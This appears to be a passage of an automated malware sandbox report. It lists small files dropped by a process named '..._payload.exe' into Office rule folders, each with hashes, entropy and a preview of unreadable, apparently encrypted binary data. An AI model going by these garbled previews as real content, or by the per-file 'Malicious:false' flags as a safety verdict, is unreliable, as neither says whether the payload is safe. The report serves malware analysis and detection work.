                                                                                                                          SSDEEP:12:0U/C9QLVZ2rPF5gV3t0gFRhkM63Oe3LErQXYFERs4JXUmrbKO5wH5PBdoOCLq5bj:0U/CuLX8kJRhkMkVbErQXYF2sWXUguao
                                                                                                                          MD5:8333F6A6ADD597C8207837444215A78B
                                                                                                                          SHA1:6F568CB90D950D465B97900CA6D7AB9DF8F5BEBA
                                                                                                                          SHA-256:68805F647739E21B997995C5AD30E4BB058DA286D3F800EFE12973E3D3E1A0D2
                                                                                                                          SHA-512:2000B5935870D741C57688A3A0177FE28AA273B8346D2E0E7B1C85B0A4291DBE8EFD69A3DBFA0A321EB25CB2B5CFFE4CDA80EA7A184349EDCE5B86CFD69B31DB
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..|."...T'...*!k.';\!.......T5A.Y........j.Rc.x..y.}.F^=..sv0a.lc...&........?Z.Z.P.p...0.g:M*gW.1...=.....9...oV=..I=.g..al.@.../C..r..q]H.tt.b^<.!.y..<P....~..F..`..-R..Rc.R.#..:XU../.:....&...#.t.G$...%..?...D$.)5_] .9./y.d.F ...Crl...l....5.....'=8..U>.i.v.!.R.......C)r...g#WN..O...^%..Q..M.V[.U.j..F.`.......|.0...........N.;V...,5../.5.....Z.>..j.$.0.s.9#_...A/...)..f.H..y^7.......!.......c.N.OIr..-..K..[....D....v....&.|7...;...2-.....J.T.%....=...Td...R....;..s...?..{.....$...DU....v...TWK.W.>.N)......|..1...x......m.dB.....k......M.....g.hy..[...C{c....9..d..v.|.t....5I.RU?.N.z..!m.3s.......H.....r......H.sq.....UE4g*..Rw#.3.B.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120630v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):832
                                                                                                                          Entropy (8bit):7.761040961565012
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:GtRBpfNSZrYpXArljchnYnLYk0toRiVINbD:Gtb9NSaArl4dTnSBD
                                                                                                                          MD5:FEDDC357649EEEDEF0664F47FD3E3897
                                                                                                                          SHA1:9C8825603609C4D59ED74B9E16B8AA235F4EF1F1
                                                                                                                          SHA-256:0CDE91B32E1BA36A95614276788DB252D616D44E1B60C25D6EDD0E42C8BD4F82
                                                                                                                          SHA-512:D3513B76987A3DD4B3F8F1359FEE797A139B4087BE99F8B9E752BDB9A7D054D31F209338B682703878EB25C43902D546BA28BCD60C6C5668805B279A806AB06F
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..,\ .qDo...]K.N.XY....E@O.'......&9b...`D..mm...I.+.Z./..U....^.=.1......_.GV?...Gb..s...;...w.[Z.S..<....$X..1.@l....r....T.o...,.`O.8n..d..&W.....56..1..,.H..{}?@....}....^1.y.@.J.m.>!.5h..}.......(.P..=Dp....`.6..|3.a.....l:..p.fG.......QN....&>P4s..$.+ud.z7N.p.i...3!.....[a...@.X.....k...W(.b........+B.M..~.R..(M...{3.!b.c......w....2< .-.8_*=...........Fa.#3S#_d..R.a^b.....J..(.8.K.{....bq)d+.|....rq{tR{.t...&....QW..j.P...ed...E....4.B..W+..S.(.4............k..k.91s.V.;...T..>..=..........\s'?....9.\...3F..[+.(..s.,...>.ee.o<[l:.6..(@.<.0....X\A.......;...4........].<..m'|.V..{.]=.+...s..y.IH.......L.x..A?.6iD.;L.H..r.........c:..%.H.8Y....F...<H..{N...H`.......9v.qp..............I.z.{M...&...f,.JphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120631v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):748
                                                                                                                          Entropy (8bit):7.685918160508474
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:a2D/nekxTieNAI2In6DkZQD3CoQ2Q4gp/PSNtFckVvZTYZq5bTcii9a:hD/HLqi6vtY4vZTYIbD
                                                                                                                          MD5:9DE4525083162051B99152B7CBB5347B
                                                                                                                          SHA1:B8213B860C6D9BEFA340791F9419B205499CE11C
                                                                                                                          SHA-256:3089461E2741FCDCA5A8F89C17330C6A1817C5948035544A27B5089D128F7D16
                                                                                                                          SHA-512:63F137DF41D06CDCE9EF8DF0E28070E6F6DA717CBD076BE68277B4B782D4EAF4E63F9B3FAFA98A4A118EE183AFB57D4FE5E4ADE9873A1AB952583C5D99A7C203
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.......:R.].....Xr..:.$..?..u.s....$K...&E..`n........3O.C.......nu.i.y.......\N\9.=W".ZA.y:.....hE."....Z..:...qxx....4..o..uPW.....p.an.....i.R..D.E...B.....4i..k+_. ...bx}......n.....TY-...h..Y......~..b7..T$.;B....j.Xl......g........S|h..cF._m.Y?YJ.....\.~.o.&._#.....*..R+.E.w.......!Y...!/.N+..!..5.h..o|9...Z.......|..[I..d.Y\>........o.....\.zt.)#.A.l.sd4..;..U!.e.R......B7....]?F.E...I.Z.C..gf..;J..t...w!..+.-X/.K........2....*...$....s..P.E.>...11KT.B..b..K..@H...u.X.#0.vDu....b.j.n.72.....M.L...h...J.Yl!.p0....G.S..P.z....F....,]t\[+.6;m.B...*.....8z..Xa..3..k~....O.Z....w..w.....0n.z...0~Y-'.r."V.....3%./..6}.....][..phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120632v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):804
                                                                                                                          Entropy (8bit):7.709229481461695
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:YtkhM9ZBsMrxhtxh+cqb04wqhU0s4zV8bD:YtkhUZiM1htxQ44JhtZwD
                                                                                                                          MD5:E2C13B05C52E7899A11EF8D085A361B3
                                                                                                                          SHA1:0B2CCD5BE54C7C4076F40D20DBBDAEFBE4D85EE0
                                                                                                                          SHA-256:0FC85CDB49B7FB8DC1224AAC811115F9791ABD15AA4D9E7CC40DE8629274047D
                                                                                                                          SHA-512:DB9BE36F9095643FAD7C6801C270BD601B20DA2594613522932FD0E816073A14828170E97481AAFC4058344AEA1422F540166EDE11A9DE038B1255B30B850CB6
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.$$. ..`b...X\..... 1C.s.q..L.:.P.....%.)...f.e9L.n.Z..Q.)k..b.3....3M.._.!E.....;...t..Aj.ES..12........g\.f.U..e...n.).i''Y.U....B4.....Q...T..........f.2.e..1...K.@.Y.....zs..U...U......C..:..6b.x.(.qS.....3....\R..hM..>......a.GC5.R7.@..e..d..rw..g_T.F..c........4.s`)../q*........<.C%.....H..V.c.....i..Xn..|~|.x...;....:i.._tQ~@c....=......].s[.8.A1.a..Ij..(.K...k..0Z..Sdm.,...Z..^i^1...Z.0..h,.0...........pN"...f.)..Z<.B@.D.%(;6vsD4.T.i%.#..,..w....(....#1%.!.O.*.Lp...A%=....Q...R.F.U1.d.+Zb..8....?U..w8&g.`v..i.>.....@.%...(.AMh....C,.:Z. b,..LH..U.....V.I....H..(7...s..............P......,...6J.z...<..I.Eqi.........L_...r...K)g.j.(..T..r../.o...<[..|.2;5...lq....phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120633v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):752
                                                                                                                          Entropy (8bit):7.705536024629733
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:WxnTGi2dZA8oi10rnHBSYJKFec2Uf1wC9TYSHY6YhmmRP/wURxwxqC6f4cmjabWi:WxnTF8oCk0NecV1wEbYhmXUjC6jmjaHX
                                                                                                                          MD5:853CA826D9838A73E3ACE9F658DAEB07
                                                                                                                          SHA1:086A71BC7F13797BA5D4216A7BEA4AF6FDBE8AE8
                                                                                                                          SHA-256:561E7FCC8436359557790BCABF1A9D4A1DF8D1D37A5EB960462D147BC6866A17
                                                                                                                          SHA-512:C2AC1A169A22EF377B21EAB0364FF95298336A4F6352A29DA6EF2117220666CD6042BB20E3FF3F95714334184A973606CA6464ACECFF182B605B3033FA7C7547
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml\....R*....f.Y..Q..j.....G.o-. ..R\...6.L..x.h.......+q..I..j.Y...p..@.D).WM.U.#._.e+.K...\........j.R(..*.d.D...;...,=..Y)........,.....y...Fg..T.t.......v.u.&..Y......J.U..9R.(A7....#.j.q;K;..sM..0.1..h.x....,T.Gt..R6^N..'....].F.Z..'.......r.....N...t.......K...v1.....X:.a.0..4k...r...CI..EHs...i)Z:........'..2..J.6......m..)......o..-h..q....\@.3..SB.T...9|5..I...-:\]...xINJ....g+......y.J_..U.y.-.~.!3.._.a/.<.......:E.T/..90;(.....%..*...|...J.v."..2..,.Ov.,35p5>T..w.$.5..R!N...[7. .s......{..-.2..<PY.l.a......D..-g..g....$..Q....W:'....nf..KO.=...n...?......v}..1..a`....h.'.dgYt)..K.@...yZ...r{Q..o.]h...!...).....b.OA.....-.Ff.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120634v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):827
                                                                                                                          Entropy (8bit):7.7209513248050605
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:h3p6rKi8rWpGRwYkuiaZ0ufojIYRRG9q4fnRo8H0PFf91Lq5bTcii9a:hZ6t8yERDBrOIYRR0q4Pq8G4bD
                                                                                                                          MD5:4D46B60E1F9B9312DC019C5C5FC79C18
                                                                                                                          SHA1:5C901BA90EB8F303BA0E45D3E75AF29895A62341
                                                                                                                          SHA-256:7A653812CA13C5CB52BA032122C1A11E4028B71329BB7C0DF285C3D5C8C69F63
                                                                                                                          SHA-512:64221DE1B32600D8FE70D79B166DD7968519A61466EE4FFDE1EC576F1F97450F531ACE7F31B90A59351229A11CE07F164B8F9334468B79ADD07AC77BF1A63625
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlO-idk@.f.&/x..j.I....1..Y.N.....|...N....p.R.a..v.l...!..d.S..x....[.I.@....@.>..R.HDz........R6.L..m.."..&.4.....!.9.6_.U..\.........G....%...z.p.]..q...Jr..../@...u.RH*. .j.9.~-f.a...f. B....k...0_J....r)z....Y....v....>....$.[..G..s65hC.!oC.Z,J...D',.5...J.}%-..~U...Q.....g.........n...l0......C..9.9z..1.)x....i..FS.nf..JJb.fLK...J..j.....Q....?r.../I....-r.&..DiF.6D.[.s. ...f?W....T).u.A...`.O....&w..6...c....@...$.a...?.x..j.A......7!p..|o.t....9....:.<.4.M.=4.L......~5...u..z...x.......f........../...@Y.....Q..:?./..j^b..$.......)....._...9.7)..91.k2.U.....(Z.w..6..k?..3B.~`.4${.....U....P..........l....\w...`!.../..b!.N.<..Ys.Y..8)..l...];[.D....Se^..C....=....n8M.x...?.....6. @.PH.m4.bC..L).phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120635v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):753
                                                                                                                          Entropy (8bit):7.6962101219969545
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:PNVWFGbebJt0T83KQbUzby28dOlEa/FGJMgk2xOExjAt+fWsW/IFtWq5bTcii9a:PLDebJu6dozGrOlJF8OOfe/IrbD
                                                                                                                          MD5:E128445999C68068229F1A35A5F64B3C
                                                                                                                          SHA1:3C40C904945BDCE8EB5FCFC1F632A6F662E7144A
                                                                                                                          SHA-256:55AB08C9E593F76CB989751DAFC6BA495043040A8A8E8B0719AB9ADB2017EB85
                                                                                                                          SHA-512:B53C1FB085817FFADAE6749F29AC80E653038A5E2458E1AFA756D351C3E9FF0B586B435671D806120A57F113935DBC85B664107C651A53019D72319F9A6A8DBF
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.04.k..Y|`1...1...r.1.?9..Zi.4..Yq)$Y.@...d..l.......m .....v...}.5.6....P....f....nI.u..!.aXTcJ....N...@X...@...n.I..[.Q.....8.ceR.S......R.W.R...P,/.....#.u...,..f.t....?..4.Cg5.<...T5.Ls.n....U....2..Crob$.y.. .6cxuM......I..l...w..el.:....K<.u0............q.L..h.... ..@.....uE..BW}........b...b(<...w0...%........s.t.2...F.>?....#..u.'.@...Cn...._..D....C...f`R2...z..}.V..bs]...-.qx..,...P..a..Yy....k.e...WQ.e.......\.#@.fN..GT...\Z....dqA..^..q:....<....Ma|h@V".2.I.>.D.[..[o....>#_td/.(.<.....c.x..[...#O.G. 7W.E.Cu)1..YQ.^..m.CY..v...........$.:..r..R..H+".7].Z.....t....4.;.~....zCK"....X...:;R.C......k.LB.V..i......zx...R.*km..0X5.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120636v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):805
                                                                                                                          Entropy (8bit):7.701297910247318
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:LGF7RmJUDoQJQcSIMUdi9yPVdJG53uOZoX/v5k1ubez4dz+oY5QFR6Cq5bTcii9a:yF7KUDt1c0BQ5uX/Rkkbo4R+kFcbD
                                                                                                                          MD5:208CC8C189857EFE9B5039CD24B57E26
                                                                                                                          SHA1:D0647BCB91EFC024EEF472275ADD9175406BA8CF
                                                                                                                          SHA-256:F3DF065838EAF67ADEE22BDD69DCBB599AA1E8A1CE75C308342083A9175EC9C2
                                                                                                                          SHA-512:2A03B3EFD60661718B398890F31641AE16153BCC37542F3FF2E5A890F792B6502A6702396D068D2A0F4529B1A3F93A997F22EA81255043DE8071BD97D5AB84E4
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..5.(Qc.........D.U..I,...-..z.|..n.....r...rnb..._=..*.@.j..g..L...2.34+p.....]..L...j{A......!.{../..E.f*R.q..:,...n.{...#...u.'./..4.A.Cu..u....%....4..R...(O.dS#GbA... ...Jr!..p[.....).j.>......@.E..7dCP..4......i...X.g...hE.G<..c.Z.x..q........dD...l...4=O>..j.KO8..r#Hvu...z.X.7.fJX...^...o...]<m.5...wOc.B.Iz.....5....5.Wu..CC78..cAE..v0..g,..fL....L.)<pUX. .....fsd2..PYZ.N.S~G\/.q~..}.S.....4.G.....A.....V4.F....Z.vQ|......{w.n..LbK~.`..)).d...c.>....d.S.....=7.^.~ K*]E.nv....!..Sq7&.D.\...]u\.r.A....SE]$\.....Q..:6U.....[.\...M.2..!..........CS\...,v.....N.A.#.+...K..g.HX.eC2.}.>c.}v*..=)...@afj.....;\....p...n..C.J.o..O.L.&|.....B.Q0..f..,X.._.~.5.\R..[....&.Zs...\.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120637v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):760
                                                                                                                          Entropy (8bit):7.664695692515255
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:IXnBCM9gp8HtG+81YDpO2p2zZHJASpckoUcvRtF4t7WqbnUKKiDY19UE0piW+6hK:IXBie58rbkkopta6qbUKKiUeEwit9Lo8
                                                                                                                          MD5:B1B718C7F41353229A4FBCE5C8242771
                                                                                                                          SHA1:A5C22CF7C0C5D45B007811DEB43F436A24B082CE
                                                                                                                          SHA-256:AC898E180267B9587390B397F86544DDD27C15BAB07DDA507D77AA443C418C5E
                                                                                                                          SHA-512:FB29DF91E8246FE85011F8A5B1D80E454A2D4056152D7834CEC7F93067C711D2FECCBFF0814A5E0911797E940AFD14D38651D3C2C815FC8908EF9C31FDB631D3
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmluLw...^.._.'.H'....g|\.u.&n.x....G...W8.0..`..(.......j.QB.l.....}.....o...f..uH*2..]....[U0+....p.Tf.T..m......./\B..<.....t.}._.~.qh+..........sp...3..!@d.....J.....D.;.^m...[...o.@.1...=E.q..p......{..1......m<.?..'C.Zgg../#.H.O.X..k. 743Ew.....D....bgz".....o.ko.......\.R3L%.[.D..{b...;.../F7.&..0.m..zE...W.;.[^..L..s|l.8.%Yj.T..{*..s......O?.h}{......q!.u=9.b.~.F..RK..s......GO....4..U~f...m..7JtB....v$.^P.0.Tq.....X..yP..8z.kH..K...%..-..t.XP...$...V.a.[;.!.S07......K....\.CZ,.r.`=E.!.v.].!..8F.W.).&~.[..z=............q.5}.'...+.P.5...Pz..5h.aw.;u`b)UD.33..r.rC..1...@.....S.X\....D.F..8...~.H.a.^...q..Z......cw.....SNkW......../.....dphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120638v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):819
                                                                                                                          Entropy (8bit):7.715754357805265
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:sx2gHAzeduOOUAT/JFTGb4qhc3KRuOgMoy3gEq/1rtrTIEjbcJ8VoLkwL9I8jq53:YbUzjBFGkN3yIy3gN/1VTTV3AcbD
                                                                                                                          MD5:DE38361402988F58A9C4ED7DAC995193
                                                                                                                          SHA1:17AC12204995341294210A4A200988B3341B057C
                                                                                                                          SHA-256:B96C745FCFE0092063BE9E9220BB536D3AAF62846F8062274F93B5EC19CCCE1F
                                                                                                                          SHA-512:833CC7447BD8234807E754BC3348272D39672F58C1D74786E23B0ADD88DDF7A13A8EE112AE19A1C58CB9EB8A1BACF817648AD11553C07674860614A67C3CA967
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml*..j.....|.l.{B..Q.64..-g....P,..g.'.0.^=a6uI..R...6...y.C.A....G.......\;)?]..T...J..[P)P.$..^.'.a.'.&.|.l-.'..(*.;....<........TM.=.....w;%.Q.F.H~..!.(rV2..v2w+.PT;W.Z.%O......(G.&.#...i.KYC;<E...o.Qf...q.....Z%.5..~......q.+.u..\......=.!H.GW./........Y..3..G"B..s7)..H<.....WzH.1..i.OU.E.....Kvg....lc.......=(.....3../..b.}!...U/.e...%...vbK..........+.6P. .......f..[...6....Y..xF....b2D*.....3.I..?..v&J-_0.'.yt..............x~...........-...t.Z.:6mt0..[R.d&.=U.P.P....j..a......^.l...]V......'A.0.?.w.N()..H..P6..3.<&)k...\.=.*..7."..u......./.d.C..//......H..p.X..E.%..c}.t...B5`.-.g.....A..GkDI..#..6d."S.gc..4...p...-Y.*.;......<..B-yJ<b#,j.N1.]*.fV..M....lM.f..{.&..u...C.f.Nu..z<..\....phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120639v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):756
                                                                                                                          Entropy (8bit):7.6932485622882725
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:QQybF7nidp+sc7USxrtiDfQbrpJd4N6dhs5lnmLwXQzYpwXyuXOt5nKUlq5bTciD:Q9pTAcA2rtiDfQb7+Oi8wgUpww1kbD
                                                                                                                          MD5:359460FCCE96377D36F1E4D792AAA672
                                                                                                                          SHA1:0319B3C659F665DF52C6C368F7411D2CB998C26F
                                                                                                                          SHA-256:41A86D64AF50E3CDA95FCEC7D781E4D6546B88E0B91D6DEAB0B6B243E4088D62
                                                                                                                          SHA-512:F1B6E42E28F8261F7DE62E8A80E36FEDF598C1FDBF79333D70D4278664BCD1332FF24F626274C4B5C88850BB56BD25874B492231D3734F5A3351B3A22AB69305
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlm.<.L...x....Ro@......E.7.d.33.....}.Dg..Snl..{.\1.Z...........^.do.E.r'.........e...'W|/...S....o..K.Ms..j%.m..U..*6.k.I=.!{..VRz.....x.2u.0:C..c[...`..Wn.&l..c..,.......0........l..2...x.......8.z 6...8.......~..).D.PmV...Dp]>.C.3....S..!r.....6.adk.<.!..?..T..0..<....(7N.R1.5..^X.l.2.. <.B<.....C._I.&.?.g....^....H..K`...../..yn=...#<.>...$..]..~+.N'..c`<../...w.Za....Z...,..!...R...........x.'.&:.[...=......<y..F.sS#.E1..].....UZf....i._.....!.D.!Y......X..^0b........a...9.H=<..7.7p. '.*W..k....eh..%...D.&...P.R....B..Q..0..7..V..y..z..9..-.Q..;..L:.v.....Z....o.X.B .; eqoHYX.......l.r..k..9.I.v^;.=....B...P..:Q.....`.....S.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120640v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):811
                                                                                                                          Entropy (8bit):7.733400281940831
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:I9mz1kquTbPCYY9Mwkrdno7m7aLBr7Z+RH53fwZeKptUhq5bTcii9a:I9HqkWFWhdmmWLNcGgKIwbD
                                                                                                                          MD5:427D03B5CF486507014371B998D8A669
                                                                                                                          SHA1:B2461AAEC642883C257BC05B8B08329F0DB7A447
                                                                                                                          SHA-256:70F8BC1B2B0616F9534A398DC9CDF4BDB1796A2670C25D5733BD32563C1A0A90
                                                                                                                          SHA-512:F26BA2E75E3F17C67239A0F9C7CD0E6C1EA70C58223AFFB8405C719C5A77D84EADA59FC86124F68470C0A895269E7BD51EAFFDC706DF2F27DC6B014D8A7BD96D
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..\......oa...m....?..D..O..Q..9....,.S.1...a.i9...*.{.....T..p...!.M.KN..s*..."....A.n..Yb.}.....i..d..Y."\.....Ow.;.?...+`.........+......4.f@.K.P.V0U......a...Y.3:.~A..+....b5..qS_.Lsqe...N...f..oB..X,w.3*.zeW.......|k...t..r@..%.O1....fk..E.D...W.a......FF....Wr.a........oG..Bb..7......Q..}}dp..]Gv...1\....Y..F.45..!rQ..R.u.x..0.'..#.B.H...L...Z.9..Z.5..VV....5....LW...w..0J<;..#.J...*.Tx[...$.+9"..c.IF..K~}...<.[...p.a..Z6........B.?.@'..S#.....:.. ...lyMu.8.....I... -.x.C.......d..RA.....C.".}. .[\...5..,t.q.[.U.....!..@..ha....<h.)...%..!....Z.....S..z...[...um...2.L....xM.~.N%@.i..]JI....!..X.1.A7{..L.{../I....K....fwV...M{/F......k...&x.z'.qO...7.:d.JB..T.b+hn.l.-..4I.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120641v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):737
                                                                                                                          Entropy (8bit):7.720238744688803
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:uZ1nhWfh/30mLv9OiLmEC8ZXyr5O+F5GBuBd4DdFoPpGsA0WS7gnVbATeownT0qt:Y1nu/3pLv9O+mEC8QrRkuudFFG7kAoTN
                                                                                                                          MD5:D8A74631CD09D3E82A595D8F77F01BF9
                                                                                                                          SHA1:4F1B78C0EBC9F04A9B817EA94B1B0D60FA721401
                                                                                                                          SHA-256:99D95E8099E1DA53A613FD4DDAC3460CF8F72ECD84ECBE5F1EE8BF0F841008BB
                                                                                                                          SHA-512:5250B0E5E32BA9AB8605C7558EB712CABD12F9A9C9C81FA0E6BE0E1FDFB803D30AE023829378C748239BDA1CB5AB3C2C984D3C9D10E2135DE33E5029047D9231
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlb..o.......b.O.7...,K.-.t.9..*Z.."..^......Z.(A..0..J.r.F...ix.O...RG. =...M.8..9.O.}8..`.._..|.;t'."{..s...y|..o.wl.c...p3R^....%........./..s.d...P3......)..g...RI...O.!`....U|.J.0..J...z_...u.%..w..p4..y.. ./.x.l...'.J.$.y;A;.....O....T.I.,..7df.%v.....K..#.%B..3.....4|{ya..U.<8....F.^.e!..1....)Z..?'?5...[...Q...!".:....<..w.........;..C..1...$.?J....y..OW.mF.t....'.`a...!...8.!][-.J.j...M......7.!Y..~.#Z.J.]7.iR%]...kQ.-.l-<+..&Qr......n...}.^..r#{.Vj..p5B.`.R.I.......T.<%o-..^........',..ek.k.)...\@...r..Wd.8..D...{g.......\#.@!..?f..K?..<.3.0r.Hh...\#...>...O..}N..J')._c."B@.P.....!..........[..a...&.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120642v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):801
                                                                                                                          Entropy (8bit):7.708330962961396
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:EJuQ4/1oBkWl5ow0XHxOHRaNW2prjHmXvJMeZnNc/LESMd1oBWmKVNq5bTcii9a:ol4/Cll5oHHxmRqmXhXnW4SMDoBLbD
                                                                                                                          MD5:A785D80C34FCFF2C6FB0B49F539463CE
                                                                                                                          SHA1:2C2043AE4059E205B4B549EE401F91869E160DAA
                                                                                                                          SHA-256:2B5BCFEF55B1AACDD745EF0A34CFD8B84ED884BEEC7AB3CA4CE27A62175B48B0
                                                                                                                          SHA-512:306E5249E2A0057D9E61286A09D2DA8D7028A5CE649EB700A2071CB37DEE3D069982914FA03BA9CDDE9E6C0A39807F5D19DDCA8CD20861B6522B7D44FDB3CD5C
                                                                                                                          Malicious:false
